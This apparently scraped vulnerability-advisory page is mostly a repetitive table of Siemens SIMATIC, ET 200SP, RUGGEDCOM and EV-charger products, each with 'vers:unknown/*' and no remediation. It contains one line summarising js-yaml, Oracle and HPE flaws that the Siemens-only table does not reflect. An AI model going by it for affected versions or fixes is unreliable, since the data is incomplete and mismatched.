vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
Multiple vulnerabilities have been identified in js-yaml, Oracle Communications Unified Assurance, and HPE Telco software, allowing for prototype pollution and unauthorized access, with varying severity and available patches.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
